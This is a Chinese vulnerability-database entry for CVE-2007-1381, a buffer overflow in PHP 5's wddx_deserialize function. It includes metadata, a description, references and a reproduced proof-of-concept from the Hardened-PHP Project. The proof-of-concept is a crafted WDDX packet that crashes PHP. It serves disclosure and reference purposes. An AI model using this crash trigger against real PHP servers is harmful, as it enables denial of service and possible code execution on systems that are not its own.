PHP 5 wddx.c wddx_deserialize函数 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112361 漏洞类型 缓冲区溢出
发布时间 2007-03-04 更新时间 2007-03-09
CVE编号 CVE-2007-1381 CNNVD-ID CNNVD-200703-291
漏洞平台 Multiple CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/3404
https://www.securityfocus.com/bid/83552
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-291
|漏洞详情
PHP5版本的wddx.c1.119.2.10.2.12和1.119.2.10.2.13中的wddx_deserialize函数会调用strlcpy和使用不正确的参数,这使得见机行事的攻击者可以借助一个包含有畸形的字符串元素的重叠部分的WDDX信息包,执行任意代码,在20070224上的CVS中已经修复和在20070304上已经修复。这会触发缓冲区溢出。
|漏洞EXP
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                PHP - wddx_deserialize() Crash Exploit              //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // The following testcode will overflow the buffer with lots of C

  wddx_deserialize(
    "<wddxPacket version='1.0'><header/>
        <data>
            <array length='1'>
                <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>
                <string></string>
            </array>
        </data>
    </wddxPacket>");
?>

# milw0rm.com [2007-03-04]
|受影响的产品
PHP PHP 5.0 .0
|参考资料

来源:MISC
链接:http://www.php-security.org/MOPB/MOPB-09-2007.html
来源:OSVDB
名称:32775
链接:http://www.osvdb.org/32775
来源:cvs.php.net
链接:http://cvs.php.net/viewvc.cgi/php-src/ext/wddx/wddx.c?revision=1.119.2.10.2.14&view=markup
来源:cvs.php.net
链接:http://cvs.php.net/viewvc.cgi/php-src/ext/wddx/wddx.c?r1=1.119.2.10.2.13&r2=1.119.2.10.2.14